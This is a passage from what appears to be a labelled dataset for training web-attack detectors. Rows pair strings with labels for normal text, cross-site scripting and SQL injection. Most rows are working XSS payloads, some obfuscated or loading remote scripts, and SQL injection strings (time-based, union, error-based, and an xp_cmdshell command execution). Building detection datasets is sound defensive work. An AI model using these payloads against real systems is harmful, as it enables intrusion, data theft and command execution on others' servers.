DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,10994 +Sierra Trading Post has a very good selection of many brands that you can select from.,0,normal,25516 +<article onpointerup=alert(1)>XSS</article>,1,XSS,6018 +Where's the best place to capture nature's beauty?,0,normal,23857 +"<keygen oncontextmenu=""alert(1)"">test</keygen>",1,XSS,7686 +Modify the recipe slightly.,0,normal,22526 +HAVING 1=1#,2,SQLi,10106 +"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'cbwx' = 'cbwx",2,SQLi,18563 +"<style>@keyframes x{}</style><keygen style=""animation-name:x"" onanimationend=""alert(1)""></keygen>",1,XSS,3285 +"-3595'+ ( select vppx where 6018 = 6018 union all select 6018,6018,6018,6018,6018#",2,SQLi,13125 +&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,1315 +1 ) or sleep ( 5 ) and ( 2211 = 2211,2,SQLi,21693 +-7430' ) as xfah where 1596 = 1596 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,14494 +-6487 ) or 6872 = 6872 and ( 7688 = 7688,2,SQLi,21256 +"<big onmouseover=""alert(1)"">test</big>",1,XSS,6216 +"""),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10785 +"<frame oncontextmenu=""alert(1)"">test</frame>",1,XSS,3967 +<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>,1,XSS,103 +Where's the hiking trail?,0,normal,23561 +1 ) ) as kiqk where 7366 = 7366 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,15944 +"<noembed onmouseleave=""alert(1)"">test</noembed>",1,XSS,6714 +"1%"" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,15056 +"1 ) and make_set ( 8403 = 8403,8899 )",2,SQLi,21267 +<button onControlSelect=javascript:alert(1)>,1,XSS,9560 +"1, ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 9693 = 9693,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,20337 +"select count ( * ) from generate_series ( 1,5000000 ) and ( ( '%' = '",2,SQLi,14990 +"1 ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( 9542 = 9542",2,SQLi,18773 +"1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,20402 +"<bdo onmouseleave=""alert(1)"">test</bdo>",1,XSS,8808 +"<section onbeforecopy=""alert(1)"" contenteditable>test</section>",1,XSS,6439 +They select the best.,0,normal,24407 +"<iframe onmousedown=""alert(1)"">test</iframe>",1,XSS,8089 +"1' or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14539 +"<dialog draggable=""true"" ondragleave=""alert(1)"">test</dialog>",1,XSS,8224 +"1"" ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,19930 +"<iframe style=""xg-p:absolute;top:0;left:0;width:100%;height:100%"" onmouseover=""prompt(1)"">",1,XSS,885 +"1' ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( 'pbtf' = 'pbtf",2,SQLi,18559 +<area onfocusout=alert(1) tabindex=1 id=x></area><input autofocus>,1,XSS,1772 +1 ) ) as pzoo where 8036 = 8036 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,12111 +"-9011"" ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,12195 +"<isindex onbeforecopy=""alert(1)"" contenteditable>test</isindex>",1,XSS,4849 +select ( case when ( 5698 = 3453 ) then 5698 else 1/ ( select 0 ) end ) --,2,SQLi,14612 +<fieldset onpointerleave=alert(1)>XSS</fieldset>,1,XSS,5641 +1' ) ) and 7533 = 7533 and ( ( 'ialm' = 'ialm,2,SQLi,21430 +"<video oncopy=""alert(1)"" contenteditable>test</video>",1,XSS,3801 +not,0,normal,23103 +<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus>,1,XSS,2393 +"1%"" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""%"" = """,2,SQLi,15105 +<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex>,1,XSS,5406 +"1' in boolean mode ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) #",2,SQLi,15250 +"&lt;A HREF=\""http&#58;//ha&#46;ckers&#46;org@google\""&gt;XSS&lt;/A&gt;",1,XSS,1012 +"1' ) ) as mxxd where 7255 = 7255 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,19713 +"1'|| ( select 'pygt' from dual where 5543 = 5543 union all select null,null,null,null,null,null#",2,SQLi,17090 +Show me where it's hosted.,0,normal,23261 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,10711 +1' ) ) and sleep ( 5 ) and ( ( 'krrr' = 'krrr,2,SQLi,18805 +"<option onmousemove=""alert(1)"">test</option>",1,XSS,7649 +Select your preferred mode of transportation.,0,normal,24116 +"<command draggable=""true"" ondragstart=""alert(1)"">test</command>",1,XSS,6778 +The collection — which launches today in select stores and on Guess.,0,normal,25439 +<h1 id=x tabindex=1 onactivate=alert(1)></h1>,1,XSS,1941 +"<tt onbeforecut=""alert(1)"" contenteditable>test</tt>",1,XSS,5145 +"1' union all select null,null,null,null,null,null,null--",2,SQLi,16607 +Where's the roller rink?,0,normal,23573 +"1"" ) where 1614 = 1614 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,16355 +"1 AND ELT(1337=1337,SLEEP(5))# 1337",2,SQLi,11181 +"<ul onclick=""alert(1)"">test</ul>",1,XSS,2557 +0x770061006900740066006F0072002000640065006C00 ...,2,SQLi,10020 +Select flavor.,0,normal,24458 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#",2,SQLi,10433 +Determine values where valid.,0,normal,23279 +select ( case when ( 3486 = 6373 ) then 3486 else 3486* ( select 3486 from mysql.db ) end ) #,2,SQLi,19272 +select * from users where id = '1' or $<\ or 1 = 1 -- 1',2,SQLi,11934 +"<input type=image src onerror=""prompt(1)"">",1,XSS,9398 +select,0,normal,26575 +1 ) as iknl where 3885 = 3885 rlike sleep ( 5 ) #,2,SQLi,18007 +-1470' ) ) ) or 9323 = 9323#,2,SQLi,16946 +Select a cozy spot for our picnic.,0,normal,22880 +"<div draggable=""true"" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable>drop here</dl>",1,XSS,3297 +<article onfocusout=alert(1) tabindex=1 id=x></article><input autofocus>,1,XSS,6028 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",2,SQLi,10712 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--",2,SQLi,22492 +"1"" ) ) ) and make_set ( 7809 = 9564,9564 ) and ( ( ( ""jggk"" like ""jggk",2,SQLi,21440 +<dialog id=x tabindex=1 onbeforedeactivate=alert(1)></dialog><input autofocus>,1,XSS,4557 +"1"" ) where 4382 = 4382 and 6607 = 2394--",2,SQLi,21752 +;SELECT pg_sleep(5);,2,SQLi,11251 +"<video onbeforecut=""alert(1)"" contenteditable>test</video>",1,XSS,7661 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></link>",1,XSS,7919 +-9484' or ( 7129 = 2349 ) *2349 and 'fcsa' like 'fcsa,2,SQLi,18551 +"<rp draggable=""true"" ondrag=""alert(1)"">test</rp>",1,XSS,8395 +"<style>:target {transform: rotate(180deg);}</style><xmp id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></xmp>",1,XSS,8215 +"1 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) # msrb",2,SQLi,12525 +-6843' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'eeff' = 'eeff,2,SQLi,16404 +"1"" ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14138 +"1%' and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and '%' = '",2,SQLi,15715 +"<kbd ondblclick=""alert(1)"">test</kbd>",1,XSS,5035 +"<body onmousemove=""alert(1)"">test</body>",1,XSS,5703 +1' ) where 6440 = 6440 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,22028 +"1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( ( 'mbxh' like 'mbxh",2,SQLi,20254 +&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;,1,XSS,1398 +"-5230"" ) or elt ( 1032 = 1032,3623 ) and ( ""aivb"" like ""aivb",2,SQLi,12527 +"select * from users where id = 1 union select 1 1$,version ( ) -- 1",2,SQLi,11845 +"1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,22066 +<marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus>,1,XSS,8850 +"<iframe src=""data:text/html,<img src=1 onerror=alert(document.domain)>"">",1,XSS,219 +"-5052 ) ) ) union all select 8351,8351,8351,8351#",2,SQLi,12851 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 8503 = 8503",2,SQLi,14203 +"1"" where 4978 = 4978 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,16469 +1' where 9708 = 9708 or sleep ( 5 ) --,2,SQLi,17568 +Create a striking masterpiece.,0,normal,22702 +"1' where 9961 = 9961 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,16203 +Select your substitute.,0,normal,25013 +"ORDER BY 1,SLEEP(5),3--",2,SQLi,10367 +"1 ) where 8008 = 8008 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,15351 +ORDER BY 24,2,SQLi,10222 +"1"" ) ) rlike sleep ( 5 ) #",2,SQLi,20500 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,10564 +"iif ( 7953 = 3021,1,1/0 )",2,SQLi,15903 +&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,1326 +1'+ ( select pagd where 2484 = 2484,2,SQLi,15421 +"<dfn onkeydown=""alert(1)"" contenteditable>test</dfn>",1,XSS,8666 +"1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'snad' like 'snad",2,SQLi,15595 +"1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,17268 +"1"" and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",2,SQLi,17411 +"-1152%' ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( '%' = '",2,SQLi,19142 +"><script+src=http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1""></script>",1,XSS,9755 +"1"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ""dqis"" = ""dqis",2,SQLi,15841 +"javascript:/*""/*\""/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()>",1,XSS,9464 +Where's the piercing studio?,0,normal,23583 +"<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>",1,XSS,9247 +Do you like to select your seat ahead of time?,0,normal,26192 +Update your profile details with accuracy.,0,normal,22957 +"<hgroup onmousemove=""alert(1)"">test</hgroup>",1,XSS,6869 +Select a travel destination for a vacation.,0,normal,24088 +"<col onmousedown=""alert(1)"">test</col>",1,XSS,2178 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--",2,SQLi,10386 +"1"" ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( ""text"" like ""text",2,SQLi,21914 +"<caption onbeforecopy=""alert(1)"" contenteditable>test</caption>",1,XSS,7677 +<progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus>,1,XSS,5526 +I'm considering where to go for a creative class.,0,normal,23752 +"-1368 ) ) union all select 1310,1310,1310,1310,1310#",2,SQLi,19581 +-1772' or 7911 = 4985#,2,SQLi,19089 +<img onpointerdown=alert(1)>XSS</img>,1,XSS,7663 +"1"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""bkrk"" = ""bkrk",2,SQLi,19247 +"1"" ) ) as uycc where 4364 = 4364 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,13070 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--",2,SQLi,10476 +"1"" ) ) and ( 1248 = 8705 ) *8705 and ( ( ""wvma"" like ""wvma",2,SQLi,15874 +"<script onbeforecopy=""alert(1)"" contenteditable>test</script>",1,XSS,3490 +"<article onmousedown=""alert(1)"">test</article>",1,XSS,5377 +"1' ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and 'aicu' = 'aicu",2,SQLi,20647 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></map>",1,XSS,3046 +"1"" ) where 5065 = 5065",2,SQLi,15724 +<code onpointerenter=alert(1)>XSS</code>,1,XSS,5291 +"1234 "" AND 1=0 UNION ALL SELECT ""admin"", ""81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,9906 +<section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus>,1,XSS,5351 +"<style>@keyframes x{}</style><progress style=""animation-name:x"" onanimationstart=""alert(1)""></progress>",1,XSS,8376 +"-4605"" ) union all select 8542,8542,8542,8542,8542,8542,8542,8542--",2,SQLi,12080 +"<script>alert(document.head.innerHTML.substr(146,20));</script>",1,XSS,9232 +"1' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( 'ichh' like 'ichh",2,SQLi,20398 +"-2418'|| ( select 'mdbt' from dual where 3026 = 3026 union all select 3026,3026,3026,3026,3026,3026,3026,3026,3026--",2,SQLi,16552 +"<s onkeydown=""alert(1)"" contenteditable>test</s>",1,XSS,3139 +Let's choose a book for our reading group.,0,normal,23748 +"1' in boolean mode ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) #",2,SQLi,17325 +"1 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) # cgow",2,SQLi,22354 +"><STYLE>@importjavascript:alert('XSS')"";</STYLE>",1,XSS,1625 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'inec' = 'inec",2,SQLi,16504 +"-1597"" union all select 6038,6038,6038,6038,6038,6038,6038,6038,6038,6038--",2,SQLi,13657 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7",2,SQLi,10313 +exec master..xp_cmdshell 'net+view',2,SQLi,9971 +"1' ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'pydi' like 'pydi",2,SQLi,16502 +"<pre onmouseenter=""alert(1)"">test</pre>",1,XSS,6347 +I'm thinking of where to spend my day off.,0,normal,23639 +Save up to 30% off select Anker Soundcore Premium Audio Products,0,normal,25682 +<script ^__^>alert(String.fromCharCode(49))</script ^__^,1,XSS,811 +"1' ) as yuqv where 6007 = 6007 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,17476 +"1%"" ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,22050 +<listing id=x tabindex=1 onactivate=alert(1)></listing>,1,XSS,7533 +1' ) where 5214 = 5214,2,SQLi,16450 +A web-based interface allows a user to select data from various data sources for a specified target geography.,0,normal,26381 +"<style>@keyframes x{}</style><main style=""animation-name:x"" onanimationstart=""alert(1)""></main>",1,XSS,1692 +1'+ ( select biqo where 6046 = 6046,2,SQLi,18391 +)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,11106 +select,0,normal,26522 +"<a onclick=""alert(1)"">test</a>",1,XSS,5934 +select,0,normal,26571 +<kbd id=x tabindex=1 onactivate=alert(1)></kbd>,1,XSS,6224 +"1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( 'nond' = 'nond",2,SQLi,12696 +"<pre oncopy=""alert(1)"" contenteditable>test</pre>",1,XSS,7552 +"1"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,14637 +"-5957 ) ) ) union all select 8485,8485,8485,8485,8485,8485,8485,8485,8485--",2,SQLi,19418 +(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#,2,SQLi,11071 +"<bdo onbeforepaste=""alert(1)"" contenteditable>test</bdo>",1,XSS,5655 +"&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;",1,XSS,1504 +"<style>@keyframes x{}</style><audio style=""animation-name:x"" onanimationstart=""alert(1)""></audio>",1,XSS,4319 +"<img onmouseover=""alert(1)"">test</img>",1,XSS,5231 +<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>,1,XSS,9685 +"-9514 ) ) as xdkw where 4975 = 4975 union all select 4975,4975,4975,4975#",2,SQLi,12224 +"<wbr onkeydown=""alert(1)"" contenteditable>test</wbr>",1,XSS,3512 +<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;,1,XSS,1571 +"<frame onbeforepaste=""alert(1)"" contenteditable>test</frame>",1,XSS,5294 +<applet onpointermove=alert(1)>XSS</applet>,1,XSS,2113 +<q id=x tabindex=1 onactivate=alert(1)></q>,1,XSS,3873 +"<progress onpaste=""alert(1)"" contenteditable>test</progress>",1,XSS,6921 +"<canvas onmousedown=""alert(1)"">test</canvas>",1,XSS,8864 +<embed src=//14.rs>,1,XSS,9535 +"1%"" ) ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( ""%"" = """,2,SQLi,14266 +Where can I select a book for my book club?,0,normal,23920 +"<progress onbeforecut=""alert(1)"" contenteditable>test</progress>",1,XSS,6673 +"1' where 2964 = 2964 union all select null,null,null#",2,SQLi,19588 +"1' in boolean mode ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) #",2,SQLi,19576 +<noframes onpointerover=alert(1)>XSS</noframes>,1,XSS,2534 +"echo('IPT>alert("""")</SCRIPT>')",1,XSS,4071 +"<time oncopy=""alert(1)"" contenteditable>test</time>",1,XSS,5981 +<li 